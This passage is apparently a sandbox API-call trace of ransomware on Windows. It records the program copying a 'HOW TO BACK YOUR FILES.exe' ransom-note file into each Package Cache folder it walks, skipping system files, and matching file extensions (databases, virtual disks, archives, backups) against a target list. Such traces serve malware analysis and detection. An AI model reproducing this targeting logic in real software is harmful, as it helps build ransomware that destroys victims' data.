Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\how to back your files.exe"), bFailIfExists=1) returned 0 [0074.363] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0074.363] GetLastError () returned 0x0 [0074.363] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0074.363] ReadFile (in: hFile=0x15c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0074.363] CloseHandle (hObject=0x15c) returned 1 [0074.363] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0074.363] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.363] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd7d760, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c14cd00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c14cd00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0074.364] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.364] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.364] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0074.364] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd7d760, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c14cd00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c14cd00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.364] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.364] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0074.364] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0074.364] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0074.364] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c14cd00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c14cd00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0074.364] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0074.364] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c14cd00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c14cd00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0074.364] lstrcmpiW (lpString1="packages", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0074.364] lstrcmpiW (lpString1="packages", lpString2="aoldtz.exe") returned 1 [0074.364] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0074.364] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0074.364] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0074.364] lstrcmpiW (lpString1="packages", lpString2="bootmgr") returned 1 [0074.364] lstrcmpiW (lpString1="packages", lpString2="temp") returned -1 [0074.364] lstrcmpiW (lpString1="packages", lpString2="pagefile.sys") returned -1 [0074.364] lstrcmpiW (lpString1="packages", lpString2="boot") returned 1 [0074.364] lstrcmpiW (lpString1="packages", lpString2="ids.txt") returned 1 [0074.364] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0074.364] lstrcmpiW (lpString1="packages", lpString2="perflogs") returned -1 [0074.364] lstrcmpiW (lpString1="packages", lpString2="MSBuild") returned 1 [0074.364] lstrlenW (lpString="packages") returned 8 [0074.364] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*") returned 84 [0074.364] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="packages" | out: lpString1="packages") returned="packages" [0074.364] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d25e0 [0074.364] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb8) returned 0x31efc8 [0074.364] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d25e8 | out: ListHead=0x2e7710, ListEntry=0x2d25e8) returned 0x2d2588 [0074.364] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c14cd00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c14cd00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0074.364] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0074.366] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d25e8 [0074.366] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" [0074.366] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31efc8 | out: hHeap=0x2b0000) returned 1 [0074.366] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25e0 | out: hHeap=0x2b0000) returned 1 [0074.366] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned 91 [0074.366] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" [0074.366] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.366] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0074.367] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0074.367] GetLastError () returned 0x0 [0074.367] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0074.367] ReadFile (in: hFile=0x15c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0074.367] CloseHandle (hObject=0x15c) returned 1 [0074.367] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0074.367] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.367] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c14cd00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c14cd00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0074.368] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.368] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.368] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0074.368] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c14cd00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c14cd00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.368] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.368] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0074.368] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0074.368] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0074.368] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c14cd00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c14cd00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0074.368] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0074.368] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c172e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c172e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0074.368] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0074.368] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="aoldtz.exe") returned 1 [0074.368] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2=".") returned 1 [0074.368] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="..") returned 1 [0074.368] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="windows") returned -1 [0074.368] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="bootmgr") returned 1 [0074.368] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="temp") returned 1 [0074.368] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="pagefile.sys") returned 1 [0074.368] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="boot") returned 1 [0074.368] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="ids.txt") returned 1 [0074.368] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="ntuser.dat") returned 1 [0074.368] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="perflogs") returned 1 [0074.368] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="MSBuild") returned 1 [0074.368] lstrlenW (lpString="vcRuntimeMinimum_x86") returned 20 [0074.368] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*") returned 93 [0074.368] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="vcRuntimeMinimum_x86" | out: lpString1="vcRuntimeMinimum_x86") returned="vcRuntimeMinimum_x86" [0074.368] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d25e0 [0074.368] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe2) returned 0x2c8eb8 [0074.368] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d25e8 | out: ListHead=0x2e7710, ListEntry=0x2d25e8) returned 0x2d2588 [0074.368] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c172e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c172e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0074.368] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0074.368] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d25e8 [0074.369] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" [0074.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0074.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25e0 | out: hHeap=0x2b0000) returned 1 [0074.369] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned 112 [0074.369] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" [0074.369] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.369] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\how to back your files.exe"), bFailIfExists=1) returned 0 [0074.369] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0074.369] GetLastError () returned 0x0 [0074.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0074.369] ReadFile (in: hFile=0x15c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0074.370] CloseHandle (hObject=0x15c) returned 1 [0074.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0074.370] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.370] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c172e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c172e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0074.370] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.370] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.370] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0074.370] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c172e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c172e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.370] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.370] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0074.370] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0074.370] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0074.370] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x884c0c00, ftCreationTime.dwHighDateTime=0x1ced4d9, ftLastAccessTime.dwLowDateTime=0x884c0c00, ftLastAccessTime.dwHighDateTime=0x1ced4d9, ftLastWriteTime.dwLowDateTime=0x884c0c00, ftLastWriteTime.dwHighDateTime=0x1ced4d9, nFileSizeHigh=0x0, nFileSizeLow=0xc89b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0074.370] lstrcmpiW (lpString1="cab1.cab", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.370] lstrcmpiW (lpString1="cab1.cab", lpString2="aoldtz.exe") returned 1 [0074.370] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0074.370] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0074.370] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0074.370] lstrcmpiW (lpString1="cab1.cab", lpString2="bootmgr") returned 1 [0074.370] lstrcmpiW (lpString1="cab1.cab", lpString2="temp") returned -1 [0074.370] lstrcmpiW (lpString1="cab1.cab", lpString2="pagefile.sys") returned -1 [0074.370] lstrcmpiW (lpString1="cab1.cab", lpString2="boot") returned 1 [0074.370] lstrcmpiW (lpString1="cab1.cab", lpString2="ids.txt") returned -1 [0074.370] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0074.370] lstrcmpiW (lpString1="cab1.cab", lpString2="perflogs") returned -1 [0074.370] lstrcmpiW (lpString1="cab1.cab", lpString2="MSBuild") returned -1 [0074.370] lstrlenW (lpString="cab1.cab") returned 8 [0074.371] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*") returned 114 [0074.371] lstrcpyW (in: lpString1=0x2cce4e2, lpString2="cab1.cab" | out: lpString1="cab1.cab") returned="cab1.cab" [0074.371] lstrlenW (lpString="cab1.cab") returned 8 [0074.371] lstrlenW (lpString="Ares865") returned 7 [0074.371] lstrcmpiW (lpString1="ab1.cab", lpString2="Ares865") returned -1 [0074.371] lstrlenW (lpString=".dll") returned 4 [0074.371] lstrcmpiW (lpString1="cab1.cab", lpString2=".dll") returned 1 [0074.371] lstrlenW (lpString=".lnk") returned 4 [0074.371] lstrcmpiW (lpString1="cab1.cab", lpString2=".lnk") returned 1 [0074.371] lstrlenW (lpString=".ini") returned 4 [0074.371] lstrcmpiW (lpString1="cab1.cab", lpString2=".ini") returned 1 [0074.371] lstrlenW (lpString=".sys") returned 4 [0074.371] lstrcmpiW (lpString1="cab1.cab", lpString2=".sys") returned 1 [0074.371] lstrlenW (lpString="cab1.cab") returned 8 [0074.371] lstrlenW (lpString="bak") returned 3 [0074.371] lstrcmpiW (lpString1="cab", lpString2="bak") returned 1 [0074.371] lstrlenW (lpString="ba_") returned 3 [0074.371] lstrcmpiW (lpString1="cab", lpString2="ba_") returned 1 [0074.371] lstrlenW (lpString="dbb") returned 3 [0074.371] lstrcmpiW (lpString1="cab", lpString2="dbb") returned -1 [0074.371] lstrlenW (lpString="vmdk") returned 4 [0074.371] lstrcmpiW (lpString1=".cab", lpString2="vmdk") returned -1 [0074.371] lstrlenW (lpString="rar") returned 3 [0074.371] lstrcmpiW (lpString1="cab", lpString2="rar") returned -1 [0074.371] lstrlenW (lpString="zip") returned 3 [0074.371] lstrcmpiW (lpString1="cab", lpString2="zip") returned -1 [0074.371] lstrlenW (lpString="tgz") returned 3 [0074.371] lstrcmpiW (lpString1="cab", lpString2="tgz") returned -1 [0074.371] lstrlenW (lpString="vbox") returned 4 [0074.371] lstrcmpiW (lpString1=".cab", lpString2="vbox") returned -1 [0074.371] lstrlenW (lpString="vdi") returned 3 [0074.371] lstrcmpiW (lpString1="cab", lpString2="vdi") returned -1 [0074.371] lstrlenW (lpString="vhd") returned 3 [0074.371] lstrcmpiW (lpString1="cab", lpString2="vhd") returned -1 [0074.371] lstrlenW (lpString="vhdx") returned 4 [0074.371] lstrcmpiW (lpString1=".cab", lpString2="vhdx") returned -1 [0074.371] lstrlenW (lpString="avhd") returned 4 [0074.371] lstrcmpiW (lpString1=".cab", lpString2="avhd") returned -1 [0074.372] lstrlenW (lpString="db") returned 2 [0074.372] lstrcmpiW (lpString1="ab", lpString2="db") returned -1 [0074.372] lstrlenW (lpString="db2") returned 3 [0074.372] lstrcmpiW (lpString1="cab", lpString2="db2") returned -1 [0074.372] lstrlenW (lpString="db3") returned 3 [0074.372] lstrcmpiW (lpString1="cab", lpString2="db3") returned -1 [0074.372] lstrlenW (lpString="dbf") returned 3 [0074.372] lstrcmpiW (lpString1="cab", lpString2="dbf") returned -1 [0074.372] lstrlenW (lpString="mdf") returned 3 [0074.372] lstrcmpiW (lpString1="cab", lpString2="mdf") returned -1 [0074.372] lstrlenW (lpString="mdb") returned 3 [0074.372] lstrcmpiW (lpString1="cab", lpString2="mdb") returned -1 [0074.372] lstrlenW (lpString="sql") returned 3 [0074.372] lstrcmpiW (lpString1="cab", lpString2="sql") returned -1 [0074.372] lstrlenW (lpString="sqlite") returned 6 [0074.372] lstrcmpiW (lpString1="b1.cab", lpString2="sqlite") returned -1 [0074.372] lstrlenW (lpString="sqlite3") returned 7 [0074.372] lstrcmpiW (lpString1="ab1.cab", lpString2="sqlite3") returned -1 [0074.372] lstrlenW (lpString="sqlitedb") returned 8 [0074.372] lstrlenW (lpString="xml") returned 3 [0074.372] lstrcmpiW (lpString1="cab", lpString2="xml") returned -1 [0074.372] lstrlenW (lpString="$er") returned 3 [0074.372] lstrcmpiW (lpString1="cab", lpString2="$er") returned 1 [0074.372] lstrlenW (lpString="4dd") returned 3 [0074.372] lstrcmpiW (lpString1="cab", lpString2="4dd") returned 1 [0074.372] lstrlenW (lpString="4dl") returned 3 [0074.372] lstrcmpiW (lpString1="cab", lpString2="4dl") returned 1 [0074.372] lstrlenW (lpString="^^^") returned 3 [0074.372] lstrcmpiW (lpString1="cab", lpString2="^^^") returned 1 [0074.372] lstrlenW (lpString="abs") returned 3 [0074.372] lstrcmpiW (lpString1="cab", lpString2="abs") returned 1 [0074.372] lstrlenW (lpString="abx") returned 3 [0074.372] lstrcmpiW (lpString1="cab", lpString2="abx") returned 1 [0074.372] lstrlenW (lpString="accdb") returned 5 [0074.372] lstrcmpiW (lpString1="1.cab", lpString2="accdb") returned -1 [0074.372] lstrlenW (lpString="accdc") returned 5 [0074.372] lstrcmpiW (lpString1="1.cab", lpString2="accdc") returned -1 [0074.372] lstrlenW (lpString="accde") returned 5 [0074.373] lstrcmpiW (lpString1="1.cab", lpString2="accde") returned -1 [0074.373] lstrlenW (lpString="accdr") returned 5 [0074.373] lstrcmpiW (lpString1="1.cab", lpString2="accdr") returned -1 [0074.373] lstrlenW (lpString="accdt") returned 5 [0074.373] lstrcmpiW (lpString1="1.cab", lpString2="accdt") returned -1 [0074.373] lstrlenW (lpString="accdw") returned 5 [0074.373] lstrcmpiW (lpString1="1.cab", lpString2="accdw") returned -1 [0074.373] lstrlenW (lpString="accft") 